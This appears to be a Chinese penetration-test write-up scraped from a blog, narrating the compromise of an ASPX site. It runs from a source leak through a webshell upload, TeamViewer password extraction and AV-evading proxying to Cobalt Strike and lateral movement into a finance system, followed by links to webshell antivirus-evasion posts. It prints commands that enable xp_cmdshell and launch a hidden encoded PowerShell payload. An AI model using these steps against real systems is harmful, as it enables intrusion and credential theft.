shell 免杀aspx_记一次aspx网站渗透
通过前期信息搜集获取到目标站的80xx端口
发现一处源码泄露
查看配置文件
登录manage.aspx
上传shell
发现安装了TeamViewer
看下进程如果运行tv的话,可直接读取其远程的账号密码
https://github.com/uknowsec/SharpDecryptPwd
SharpDecryptPwd
对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。
本地演示如下
翻找文件,jar包反编译,获取到数据库账号密码和redis密码
由于shell不是system权限,且存在多个杀软。
利用免杀frp代理,利用数据库提权
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
开启xp_cmdshell
execsp_configure 'show advanced options', 1;reconfigure;
execsp_configure 'xp_cmdshell',1;reconfigure;
添加用户并添加到管理员组
由于装了天q,新添加的用户无法登录。
那么利用数据库执行命令,上线cs
cmdshell执行时需要编码一下
EXEC master.dbo.xp_cmdshell 'powershell.exe -nop -w hidden -enc xxxxxxxxxxxxxxxxxxxxxxx'
上线cs,抓取密码
利用获取的密码进行横向爆破
发现多台服务器桌面存在密码本和连接生产系统的Anydesk
财务系统
内网没有域,就搞搞数据库和系统了。
shell 免杀aspx_记一次aspx网站渗透相关推荐
- shell 免杀aspx_对于asp免杀webshell的一些总结
0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...
- shell 免杀aspx_避开eval关键字,打造免杀一句话木马
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量. ...
- shell 免杀aspx_asp免杀webshell木马总结
0x00 前言 asp免杀webshell木马总结 简单的介绍下asp的免杀,相对于php我们的asp还是不够灵活. 0x01 目录 数组 函数 加密 注释符 类 字符串操作 0x02 了解asp一句 ...
- shell 免杀aspx_webshell免杀套路
0x01 前言 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录关于eval 与 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 ...
- shell 免杀aspx_Webshell免杀
一句话木马 在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合.如果出现某种WAF防护,就寻找一个免杀的大马挂马. 最常见的php一句话木马<?php @eval($_POST['x ...
- 云锁 php一句话,关于php一句话免杀的分析转载
一开始想这样: <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什 ...
- Kail Linux渗透测试教程之免杀Payload生成工具Veil
Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...
- 记一次PowerShell免杀实战
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家. 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Win ...
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
最新文章
- 线性代数:05 实对称矩阵与二次型
- linux arch 软件管理工具 pacman 简介
- pyotrch nn.Conv2d中groups参数的理解
- SpringBoot配置Mybatis在控制台打印sql
- php中mb substr,php中中文截取函数mb_substr()详细
- js localdate上一个月_moment.js格式化日期,获取前一个月的时间
- java webrtc ns降噪_单独编译和使用webrtc音频降噪模块(附完整源码+测试音频文件)...
- SAP UI5 sap.viz.ui5.controls.VizFrame 的 aggregation 之一:dataset
- Android之设置横屏竖屏
- win11白屏死机怎么办 Windows11白屏死机的解决方法
- 1次订单事故,扣了我3个月绩效!
- 10074 启用开发者模式 for vs2015rc
- 解决办法:无法修正错误,因为您要求某些软件包保持现状,就是它们破坏了软件包间的依赖关系。
- Linux中不同文字颜色代表的含义
- 推荐系统序列化建模总结
- 基于纹理的印章识别分离——发票识别之一
- 【Cheatsheet】Java的常用代码(以及eclipse技巧)
- Java 多态的薪酬计算的练习
- 领先大厂股价大跌,半导体行业形势不妙
- 什么是前端渲染和后端渲染和SPA页面
热门文章
- MongoDB更新文档(非常详细,不要错过~)
- java找出最高工资和下标_Java 8 lambda用于为每个部门选择最高薪资员工
- 查看从库mysql同步错误日志_常见MySQL同步错误恢复方法
- 我的开源项目:FLV封装格式分析器
- postmapping注解参数说明_这么写参数校验(validator)就不会被劝退了~
- matlab 矩阵jocobi迭代_计算方法实验指导书1 -
- 【服务器】【私有云】宝塔安装KodExplorer
- 【codevs1295】N皇后问题
- 【Luogu1048】采药
- 知道cve编号怎么搜poc_想在海南买房不知道该怎么选?快来看看这些热搜楼盘吧!...